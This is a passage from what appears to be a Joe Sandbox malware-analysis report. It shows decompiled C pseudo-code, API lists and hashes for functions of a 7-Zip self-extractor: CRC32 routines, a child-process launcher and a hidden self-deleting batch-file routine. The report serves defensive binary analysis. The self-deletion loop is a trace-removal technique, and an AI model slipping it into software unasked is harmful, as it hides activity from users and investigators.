!((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t73 = _t73 + 1;
				} while (_t73 < 0x100);
				while(_t73 < 0x800) {
					_t39 =  *(0x420780 + _t73 * 4);
					_t73 = _t73 + 1;
					 *(0x420b7c + _t73 * 4) = _t39 >> 0x00000008 ^  *(0x420b80 + (_t39 & 0x000000ff) * 4);
				}
				 *0x420b74 = 0x419630;
				 *0x422b80 = 0x419630;
				 *0x420b70 = 0x419550;
				_t38 = E00419060();
				if(_t38 == 0) {
					 *0x422b80 = 0x419550;
					return _t38;
				}
				return _t38;
			}

0x00418d50
0x00418d52
0x00418de0
0x00418de7
0x00418de8
0x00418dfa
0x00418e00
0x00418e19
0x00418e1a
0x00418e21
0x00418e2e
0x00418e33
0x00418e38
0x00418e42
0x00418e49
0x00418e4b
0x00000000
0x00418e4b
0x00418e55

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f676c29db07d748d27b39d428b6e09ec32336efd2a80984568a862303c1556d
Instruction ID: 51037b27fab7abe5882109eaafdaafd36d1536c3e678e8b13c54931181ec04f6
Opcode Fuzzy Hash: 4f676c29db07d748d27b39d428b6e09ec32336efd2a80984568a862303c1556d
Instruction Fuzzy Hash: D9211D7E370D0607A76C8B6DAD336B925C2E344348BC8A53DE14BC62D1EF6C9895C64D

Uniqueness

Uniqueness Score: -1.00%

Function 00419551, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00419551(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
				signed char _t42;
				signed int _t44;
				signed int _t50;
				signed int _t51;
				unsigned int _t59;
				signed char _t60;
				signed int _t62;
				void* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t69;
				signed int _t73;
				signed int _t83;
				intOrPtr _t86;

				_t62 = __edx;
				_t42 = __ecx;
				_t65 = _a8;
				_t86 = _a12;
				if(_t65 != 0) {
					while((_t62 & 0x00000007) != 0) {
						_t83 =  *_t62 & 0x000000ff;
						_t62 = _t62 + 1;
						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t67 = _t65 + _t62;
						_a8 = _t67;
						_t69 = _t67 - 0x00000008 & 0xfffffff8;
						_t63 = _t62 - _t69;
						_t44 = _t42 ^  *(_t63 + _t69);
						_t59 =  *(_t63 + _t69 + 4);
						do {
							_t50 = _t59 & 0x000000ff;
							_t51 = _t59 & 0x000000ff;
							_t60 = _t59 >> 0x10;
							_t59 =  *(_t63 + _t69 + 0xc);
							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
							_t63 = _t63 + 8;
						} while (_t63 != 0);
						_t42 = _t44 ^  *(_t63 + _t69);
						_t62 = _t69;
						_t65 = _a8 - _t62;
						L7:
						while(_t65 != 0) {
							_t73 =  *_t62 & 0x000000ff;
							_t62 = _t62 + 1;
							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t42;
					}
				}
				goto L7;
			}

0x00419551
0x00419554
0x00419556
0x0041955a
0x00419560
0x00419566
0x0041956e
0x00419571
0x0041957a
0x0041957e
0x0041957f
0x00000000
0x00000000
0x00000000
0x0041957f
0x00419584
0x0041958a
0x0041958c
0x00419593
0x00419596
0x00419598
0x0041959b
0x004195a0
0x004195a4
0x004195ae
0x004195b8
0x004195cf
0x004195fb
0x004195fd
0x004195fd
0x00419602
0x00419605
0x0041960b
0x00000000
0x0041960d
0x00419611
0x00419614
0x0041961d
0x00419621
0x00419621
0x00419628
0x00419628
0x00419584
0x00000000

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: a7cdcc9f98ce9dbc60a73427d99236a85b447d866e4190eca6a24d33d7e231e4
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: E421D33290062557CB02CE6EE4945A7F3A2FBD436AF174727ED8463290C628AC54C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0041962B, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0041962B(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed char _t39;
				signed int _t41;
				signed int _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t70;
				signed int _t74;
				intOrPtr _t76;

				_t63 = __edx;
				_t39 = __ecx;
				_t65 = _a4;
				_t76 = _a8;
				if(_t65 != 0) {
					while((_t63 & 0x00000007) != 0) {
						_t74 =  *_t63 & 0x000000ff;
						_t63 = _t63 + 1;
						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t66 = _t65 + _t63;
						_a4 = _t66;
						_t68 = _t66 - 0x00000008 & 0xfffffff8;
						_t64 = _t63 - _t68;
						_t41 = _t39 ^  *(_t64 + _t68);
						do {
							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
							_t64 = _t64 + 8;
						} while (_t64 != 0);
						_t39 = _t41 ^  *(_t64 + _t68);
						_t63 = _t68;
						_t65 = _a4 - _t63;
						L8:
						while(_t65 != 0) {
							_t70 =  *_t63 & 0x000000ff;
							_t63 = _t63 + 1;
							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t39;
					}
				}
				goto L8;
			}

0x0041962b
0x00419634
0x00419636
0x0041963a
0x00419640
0x00419646
0x0041964e
0x00419651
0x0041965a
0x0041965e
0x0041965f
0x00000000
0x00000000
0x00000000
0x0041965f
0x00419664
0x0041966a
0x0041966c
0x00419673
0x00419676
0x00419678
0x00419680
0x004196d6
0x004196dd
0x004196dd
0x004196e2
0x004196e5
0x004196eb
0x00000000
0x004196ed
0x004196f1
0x004196f4
0x004196fd
0x00419701
0x00419701
0x00419708
0x00419708
0x00419664
0x00000000

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: 97b97acb8ff96b1b4e43437944a1cf665e1ec4585e0b194a145c9dbb8504525b
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: 6F21297251442587C701DF5DE4986B7B3E1FFD4319F678A37D9818B180C638DC85D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 00401DCA, Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 196
threadprocesssynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00401DCA(void* __ecx, void* __edx, void* __eflags) {
				void* _t58;
				void* _t83;
				void* _t88;
				int _t100;
				void* _t131;
				void* _t138;
				void* _t139;
				long _t140;
				intOrPtr* _t142;
				void* _t144;
				void* _t148;

				_t148 = __eflags;
				_t142 = _t144 - 0x74;
				_t131 = __ecx;
				_t138 = __edx;
				E00411B60(E00411B60(_t58, _t142 + 0x30), _t142 + 0x3c);
				E0040310A(GetCommandLineW(), _t142 + 0x30);
				E00411A62(_t142 + 0xc, _t148, E00411B08(_t142, E00411B08(_t142 - 0xc, E00411B32(_t142 - 0x18, "\"", _t142 + 0x30), L"\" -"), L"sfxwaitall"), 0x3a);
				E00411A62(_t142 + 0x24, _t148, _t142 + 0xc,  *(_t142 + 0x7c) + 0x30);
				E00411A62(_t142 + 0x18, _t148, _t142 + 0x24, 0x20);
				E00411A62(_t142 + 0x5c, _t148, _t142 + 0x18, 0x22);
				E00411BE5(_t142 + 0x3c,  *((intOrPtr*)(E00411B08(_t142 - 0x24, E00411B08(_t142 - 0x30, E00411B08(_t142 - 0x3c, _t142 + 0x5c, _t131), L"\" "), _t138))));
				_push( *((intOrPtr*)(_t142 - 0x24)));
				L004191B0();
				_push( *((intOrPtr*)(_t142 - 0x30)));
				L004191B0();
				_push( *((intOrPtr*)(_t142 - 0x3c)));
				L004191B0();
				_push( *((intOrPtr*)(_t142 + 0x5c)));
				L004191B0();
				_push( *((intOrPtr*)(_t142 + 0x18)));
				L004191B0();
				_push( *((intOrPtr*)(_t142 + 0x24)));
				L004191B0();
				_push( *((intOrPtr*)(_t142 + 0xc)));
				L004191B0();
				_push( *_t142);
				L004191B0();
				_push( *((intOrPtr*)(_t142 - 0xc)));
				L004191B0();
				_push( *((intOrPtr*)(_t142 - 0x18)));
				L004191B0();
				 *(_t142 - 0x80) = 0x44;
				GetStartupInfoW(_t142 - 0x80);
				_t83 = CreateProcessW(0,  *(_t142 + 0x3c), 0, 0, 1, 0x1000004, 0,  *0x41e89c, _t142 - 0x80, _t142 + 0x48);
				if(_t83 != 0) {
					_t139 = 0;
					__imp__CreateJobObjectW(0, 0);
					 *(_t142 + 0x7c) = _t83;
					__eflags = _t83;
					if(_t83 == 0) {
						L9:
						ResumeThread( *(_t142 + 0x4c));
						WaitForSingleObject( *(_t142 + 0x48), 0xffffffff);
						L10:
						CloseHandle( *(_t142 + 0x4c));
						_t88 = GetExitCodeProcess( *(_t142 + 0x48), _t142 + 0x6c);
						__eflags = _t88;
						if(_t88 == 0) {
							 *(_t142 + 0x6c) = GetLastError();
						}
						CloseHandle( *(_t142 + 0x48));
						__eflags = _t139;
						if(_t139 != 0) {
							CloseHandle(_t139);
						}
						__eflags =  *(_t142 + 0x7c);
						if( *(_t142 + 0x7c) != 0) {
							CloseHandle( *(_t142 + 0x7c));
						}
						_t140 =  *(_t142 + 0x6c);
						L2:
						_push( *(_t142 + 0x3c));
						L004191B0();
						_push( *((intOrPtr*)(_t142 + 0x30)));
						L004191B0();
						return _t140;
					}
					__imp__AssignProcessToJobObject(_t83,  *(_t142 + 0x48));
					__eflags = _t83;
					if(_t83 == 0) {
						goto L9;
					}
					_t139 = CreateIoCompletionPort(0xffffffff, 0, 1, 0);
					__eflags = _t139;
					if(_t139 == 0) {
						goto L9;
					}
					 *((intOrPtr*)(_t142 + 0x60)) = 1;
					 *(_t142 + 0x64) = _t139;
					__imp__SetInformationJobObject( *(_t142 + 0x7c), 7, _t142 + 0x60, 8);
					ResumeThread( *(_t142 + 0x4c));
					while(1) {
						_t100 = GetQueuedCompletionStatus(_t139, _t142 + 0x70, _t142 + 0x68, _t142 + 0x58, 0xffffffff);
						__eflags = _t100;
						if(_t100 == 0) {
							goto L9;
						}
						__eflags =  *(_t142 + 0x70) - 4;
						if( *(_t142 + 0x70) == 4) {
							goto L10;
						}
					}
					goto L9;
				}
				_t140 = GetLastError();
				goto L2;
			}

0x00401dca
0x00401dcb
0x00401dd8
0x00401ddd
0x00401de7
0x00401df7
0x00401e31
0x00401e44
0x00401e52
0x00401e60
0x00401e90
0x00401e95
0x00401e98
0x00401e9d
0x00401ea0
0x00401ea5
0x00401ea8
0x00401ead
0x00401eb0
0x00401eb5
0x00401eb8
0x00401ebd
0x00401ec0
0x00401ec5
0x00401ec8
0x00401ecd
0x00401ed0
0x00401ed5
0x00401ed8
0x00401edd
0x00401ee0
0x00401eec
0x00401ef3
0x00401f19
0x00401f21
0x00401f4b
0x00401f4d
0x00401f53
0x00401f56
0x00401f58
0x00401fbc
0x00401fbf
0x00401fca
0x00401fd0
0x00401fd9
0x00401fe2
0x00401fe8
0x00401fea
0x00401ff2
0x00401ff2
0x00401ff8
0x00401ffa
0x00401ffc
0x00401fff
0x00401fff
0x00402001
0x00402004
0x00402009
0x00402009
0x0040200b
0x00401f2b
0x00401f2b
0x00401f2e
0x00401f33
0x00401f36
0x00401f46
0x00401f46
0x00401f5e
0x00401f64
0x00401f66
0x00000000
0x00000000
0x00401f73
0x00401f75
0x00401f77
0x00000000
0x00000000
0x00401f84
0x00401f87
0x00401f8a
0x00401f93
0x00401fa7
0x00401fb6
0x00401fb8
0x00401fba
0x00000000
0x00000000
0x00401fa1
0x00401fa5
0x00000000
0x00000000
0x00401fa5
0x00000000
0x00401fa7
0x00401f29
0x00000000

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

GetCommandLineW.KERNEL32(0041A9F0,00000000,00000000), ref: 00401DEC

Part of subcall function 00411A62: memcpy.MSVCRT ref: 00411A87

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

??3@YAXPAX@Z.MSVCRT ref: 00401E98
??3@YAXPAX@Z.MSVCRT ref: 00401EA0
??3@YAXPAX@Z.MSVCRT ref: 00401EA8
??3@YAXPAX@Z.MSVCRT ref: 00401EB0
??3@YAXPAX@Z.MSVCRT ref: 00401EB8
??3@YAXPAX@Z.MSVCRT ref: 00401EC0
??3@YAXPAX@Z.MSVCRT ref: 00401EC8
??3@YAXPAX@Z.MSVCRT ref: 00401ED0
??3@YAXPAX@Z.MSVCRT ref: 00401ED8
??3@YAXPAX@Z.MSVCRT ref: 00401EE0
GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401EF3
CreateProcessW.KERNEL32 ref: 00401F19
GetLastError.KERNEL32 ref: 00401F23
??3@YAXPAX@Z.MSVCRT ref: 00401F2E
??3@YAXPAX@Z.MSVCRT ref: 00401F36
CreateJobObjectW.KERNEL32 ref: 00401F4D
AssignProcessToJobObject.KERNEL32 ref: 00401F5E
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000), ref: 00401F6D
SetInformationJobObject.KERNEL32 ref: 00401F8A
ResumeThread.KERNEL32(?), ref: 00401F93
GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF), ref: 00401FB6
ResumeThread.KERNEL32(?), ref: 00401FBF
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401FCA
CloseHandle.KERNEL32(?), ref: 00401FD9
GetExitCodeProcess.KERNEL32 ref: 00401FE2
GetLastError.KERNEL32 ref: 00401FEC
CloseHandle.KERNEL32(?), ref: 00401FF8
CloseHandle.KERNEL32(00000000), ref: 00401FFF
CloseHandle.KERNEL32(?), ref: 00402009

Strings

" -, xrefs: 00401E01
sfxwaitall, xrefs: 00401DFC

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$CloseHandleObject$CreateProcess$??2@CompletionErrorLastResumeThreadmemcpy$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
String ID: " -$sfxwaitall
API String ID: 1989023053-3991362806
Opcode ID: b512eb50f073bc5073f6029a29708b2a397875fe1bb3ba0b5eecb9327caccc6b
Instruction ID: 5297b6db97987cb25ecf0bcc30189225a2ece590cb556cf519fd76e88c7d76d0
Opcode Fuzzy Hash: b512eb50f073bc5073f6029a29708b2a397875fe1bb3ba0b5eecb9327caccc6b
Instruction Fuzzy Hash: 21615A32500109BFDF11AF61DC45DEE7BB9AF04348F14813AFA12A21B1EB39AD95CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405B8E, Relevance: 38.6, APIs: 14, Strings: 8, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405B8E(void* __esi, WCHAR* _a4) {
				long _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				long _v24;
				char _v28;
				WCHAR* _v40;
				char _v52;
				void* _t42;
				short _t44;
				short _t45;
				int _t66;
				void* _t72;
				signed int _t74;
				void* _t99;

				_t99 = __esi;
				_t42 = _a4;
				if( *((short*)(_t42 + 2)) != 0x3a) {
					L11:
					_push(_t42);
					goto L12;
				} else {
					_t3 = _t42 + 4; // 0x120e8
					_t74 =  *_t3 & 0x0000ffff;
					if(_t74 == 0x5c || _t74 == 0x2f) {
						_v16 =  *_t42;
						_t44 = 0x3a;
						_v14 = _t44;
						_t45 = 0x5c;
						_v12 = _t45;
						_v10 = 0;
						_t42 = GetDriveTypeW( &_v16);
						if(_t42 == 3) {
							E0040439D(L"7ZSfx%03x.cmd", __eflags);
							_t42 = CreateFileW(_v40, 0x40000000, 0, 0, 2, 0x80, 0);
							_t72 = _t42;
							__eflags = _t72 - 0xffffffff;
							if(_t72 == 0xffffffff) {
								L9:
								_push(_v40);
								L004191B0();
								_push(_a4);
								L004191B0();
								goto L13;
							} else {
								_push(_t99);
								E00411B60(_t42,  &_v28);
								E00411BE5( &_v28, L":Repeat\r\n");
								E00411CA3( &_v28, L"del \"");
								E00411CE3( &_v28, __eflags,  &_a4);
								E00411CA3( &_v28, L"\"\r\n");
								E00411CA3( &_v28, L"if exist \"");
								E00411CE3( &_v28, __eflags,  &_a4);
								E00411CA3( &_v28, L"\" goto Repeat\r\n");
								E00411CA3( &_v28, L"del \"");
								E00411CE3( &_v28, __eflags,  &_v40);
								E00411CA3( &_v28, L"\"\r\n");
								_t66 = WriteFile(_t72,  *(E00404473( &_v52,  &_v28, __eflags, 1)), _v24,  &_v8, 0);
								_push(_v52);
								L004191B0();
								CloseHandle(_t72);
								__eflags = _t66;
								if(_t66 == 0) {
									L10:
									_t42 = E0040352A(_v40);
									_push(_v28);
									L004191B0();
									_push(_v40);
									L004191B0();
									_push(_a4);
									L004191B0();
								} else {
									__eflags = _v8 - _v24;
									if(_v8 != _v24) {
										goto L10;
									} else {
										SetFileAttributesW(_a4, 0);
										_t42 = ShellExecuteW(0, L"open", _v40, 0, 0, 0);
										_push(_v28);
										L004191B0();
										goto L9;
									}
								}
							}
						} else {
							_push(_a4);
							L12:
							L004191B0();
							L13:
						}
					} else {
						goto L11;
					}
				}
				return _t42;
			}

0x00405b8e
0x00405b91
0x00405b9e
0x00405d3a
0x00405d3a
0x00000000
0x00405ba4
0x00405ba4
0x00405ba4
0x00405bab
0x00405bbb
0x00405bbf
0x00405bc0
0x00405bc6
0x00405bc7
0x00405bcd
0x00405bd5
0x00405bde
0x00405bf0
0x00405c09
0x00405c0f
0x00405c11
0x00405c14
0x00405d02
0x00405d02
0x00405d05
0x00405d0a
0x00405d0d
0x00000000
0x00405c1a
0x00405c1a
0x00405c1e
0x00405c2b
0x00405c39
0x00405c45
0x00405c53
0x00405c60
0x00405c6c
0x00405c79
0x00405c82
0x00405c8e
0x00405c97
0x00405cb8
0x00405cbe
0x00405cc3
0x00405cca
0x00405cd0
0x00405cd3
0x00405d15
0x00405d18
0x00405d1d
0x00405d20
0x00405d25
0x00405d28
0x00405d2d
0x00405d30
0x00405cd5
0x00405cd8
0x00405cdb
0x00000000
0x00405cdd
0x00405ce1
0x00405cf3
0x00405cf9
0x00405cfc
0x00000000
0x00405d01
0x00405cdb
0x00405cd3
0x00405be0
0x00405be0
0x00405d3b
0x00405d3b
0x00405d40
0x00405d40
0x00000000
0x00000000
0x00000000
0x00405bab
0x00405d44

APIs

GetDriveTypeW.KERNEL32(?,PreExtract,00000000,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract), ref: 00405BD5

Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
Part of subcall function 0040439D: wsprintfW.USER32 ref: 00404400
Part of subcall function 0040439D: GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405C09
WriteFile.KERNEL32(00000000,?,?,0041E844,00000000,00000001,",?,del "," goto Repeat,004070C0,if exist ",",004070C0,del ",:Repeat), ref: 00405CB8
??3@YAXPAX@Z.MSVCRT ref: 00405CC3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CCA
SetFileAttributesW.KERNEL32(004070C0,00000000,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CE1
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00405CF3
??3@YAXPAX@Z.MSVCRT ref: 00405CFC
??3@YAXPAX@Z.MSVCRT ref: 00405D05
??3@YAXPAX@Z.MSVCRT ref: 00405D0D

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

Part of subcall function 00411CE3: memcpy.MSVCRT ref: 00411D06

Part of subcall function 00404473: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00000000,0041E080,00BC2510,004016D0,0000FDE9,00BC2510), ref: 004044A6

??3@YAXPAX@Z.MSVCRT ref: 00405D20
??3@YAXPAX@Z.MSVCRT ref: 00405D28
??3@YAXPAX@Z.MSVCRT ref: 00405D30
??3@YAXPAX@Z.MSVCRT ref: 00405D3B

Strings

del ", xrefs: 00405C30, 00405C35, 00405C7E
7ZSfx%03x.cmd, xrefs: 00405BE8
open, xrefs: 00405CED
if exist ", xrefs: 00405C58
:Repeat, xrefs: 00405C23
" goto Repeat, xrefs: 00405C71
", xrefs: 00405C4A, 00405C4F, 00405C93
PreExtract, xrefs: 00405B9D

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$File$memcpy$??2@AttributesPathTemp$ByteCharCloseCreateDriveExecuteHandleMultiShellTypeWideWritewsprintf
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$PreExtract$del "$if exist "$open
API String ID: 1368565367-2062918900
Opcode ID: 6a2c42ab4ba589dd8ec8f7f6231d9d8f7900a9009e1932f2d8cd21323a083c06
Instruction ID: e7338ad49e5ec867d94482016769a831fa3651e0b874e5bd32b93c107b1fbaea
Opcode Fuzzy Hash: 6a2c42ab4ba589dd8ec8f7f6231d9d8f7900a9009e1932f2d8cd21323a083c06
Instruction Fuzzy Hash: BE415031904004BADB05EBA1DC5ADEF7B75EF45304F10806BF602B61A5EB786EC5CB98

Uniqueness

Uniqueness Score: -1.00%
